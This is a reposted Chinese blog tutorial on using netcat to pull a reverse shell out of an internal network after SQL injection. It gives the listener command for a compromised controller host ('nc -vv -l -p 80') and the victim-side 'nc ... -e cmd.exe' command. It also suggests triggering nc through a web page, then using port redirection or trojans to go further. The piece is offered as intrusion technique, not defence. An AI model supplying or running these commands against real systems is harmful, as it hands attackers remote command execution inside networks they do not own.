nc命令小材大用

简介:


nc命令小材大用

simeon
通过本文你可以学到:
1SQL注入内网渗透的一种思路
2nc命令的一种好用法
   内网渗透对于网络安全爱好者,特别是网络入侵检测时无疑是一种疼,很多时候我们遇到这种情况只有采取放弃,其实不然,完全使用另外一种方法来进行突破。很多人多知道nc号称瑞士军刀,是一款非常不错的网络安全工具,其强大的功能毫不逊于一款远程控制软件,只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对nc的具体用法。
(一)在控制端监听端口
这个控制端可以是自己的肉鸡,可以是在具有独立IP的网络计算机上,一定要具有独立IP,否则无法反弹到该IP地址。使用命令如下:
Nc –vv –l –p port 例如 nc –vv –l –p 80
在控制端监听端口时,需要注意的是,需要先使用“netstat -an”查看网络端口的开放情况(图1),选择一个未监听的端口,一般选择804434461102523端口为好,当然其他未用端口也可以。
使用netstat –an 查看端口开情况
说明:如果控制端已经开放了我们要监听的端口,那么我们使用nc监听该端口不会成功,nc程序会提示错误信息,如果监听正常,会显示“Listening on  [any] 80 …….”字样(图2)。
在控制端监听80端口
(二)在内网计算机开放端口
      在内网计算机上运行“nc –vv ipaddress port –e cmd.exe”,这里的IPaddress一定是控制端的ip地址,例如控制端的地址为“202.108. 33.32 ,且80端口未开放,则在内网计算机上运行“nc –vv -202.108. 33.32  80 –e cmd.exe”即可。如果一切正常,则会反弹一个dosshell回来,跟cmd命令的运行界面差不多,就象在本机的DOS下操作一样,非常好用,可以粘贴命令,直接执行命令等(图3)。使用“net user”命令,可以看到我的账号“simeon”在其中。
反弹shell成功
(三)其它运用
本文介绍的是如何使用nc来反弹内网的shell,在sql注入的过程中,很多时候遇到独立主机是内网IP,及时主机开放了3389也无法连接进去,这个时候,一个真正的dosshell就特别重要,通过网页执行nc命令,提供该内网一个shell,然后执行lcx端口重定向或者执行反弹木马或者其他命令,无疑是一个很好的解决方法。
(四)结束语
    本文就技术难度来说,并不是很大,nc这个软件很多朋友都熟悉,可以这么说,搞网络安全的没有不熟悉nc这个软件的,但是对于nc命令的很多用法,不一定熟悉。想不起来曾经看过的一部电影,其中有这么一段话,高手就是将一个复杂的动作做到单一和简单!这跟真正的武林高手一样,不一定需要太多招式,一刀一剑就可以致命取胜。网络安全也是如此,对一个工具要熟能生巧,举一反三,才能出现更多的用法,更多的新的idea,期待大家新的发现。


 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/38498

相关文章
kde
|
7天前
|
JSON Linux 数据格式
Docker镜像加速指南:手把手教你配置国内镜像源
配置国内镜像源可大幅提升 Docker 拉取速度,解决访问 Docker Hub 缓慢问题。本文详解 Linux、Docker Desktop 配置方法,并提供测速对比与常见问题解答,附最新可用镜像源列表,助力高效开发部署。
kde
4379 10
|
1天前
|
人工智能 安全 Java
|
7天前
|
JavaScript Ubuntu IDE
国内如何安装和使用 Claude Code镜像教程 - Windows 用户篇
国内如何安装和使用 Claude Code镜像教程 - Windows 用户篇
726 2
|
10天前
|
人工智能 定位技术 API
Dify MCP 保姆级教程来了!
大语言模型,例如 DeepSeek,如果不能联网、不能操作外部工具,只能是聊天机器人。除了聊天没什么可做的。
1101 14
|
5天前
|
人工智能 Java Spring
【保姆级图文详解】大模型、Spring AI编程调用大模型
【保姆级图文详解】大模型、Spring AI编程调用大模型
461 7
【保姆级图文详解】大模型、Spring AI编程调用大模型
|
4天前
typora免费版,激活方法,Typora使用教程
Typora是一款简洁高效的Markdown编辑器,支持即时渲染。本教程涵盖安装方法、文件操作、视图控制、格式排版、字体样式及Markdown语法,助你快速上手使用Typora进行高效写作。
865 0
|
16天前
|
Java Linux Maven
2025年最新版最细致Maven安装与配置指南(任何版本都可以依据本文章配置)
本文详细介绍了Maven的项目管理工具特性、安装步骤和配置方法。主要内容包括: Maven概述:解释Maven作为基于POM的构建工具,具备依赖管理、构建生命周期和仓库管理等功能。 安装步骤: 从官网下载最新版本 解压到指定目录 创建本地仓库文件夹 关键配置: 修改settings.xml文件 配置阿里云和清华大学镜像仓库以加速依赖下载 设置本地仓库路径 附加说明:包含详细的配置示例和截图指导,适用于各种操作系统环境。 本文提供了完整的Maven安装和配置
2025年最新版最细致Maven安装与配置指南(任何版本都可以依据本文章配置)
|
3天前
|
数据采集 监控 数据挖掘
企业如何用Data Agent实现数据价值效率的飞跃
在数字化转型背景下,数据被视为“新时代的石油”,但多数企业仍面临数据价值难以高效挖掘的困境。文章深入剖析了当前数据分析中存在的“被动响应”模式及其带来的四大挑战,并提出通过Data Agent实现主动智能与数据分析民主化的新路径。Data Agent基于大语言模型和强化学习技术,具备理解、思考与行动能力,能够从“人找数据”转变为“数据找人”,推动数据洞察从专业人员走向全员参与。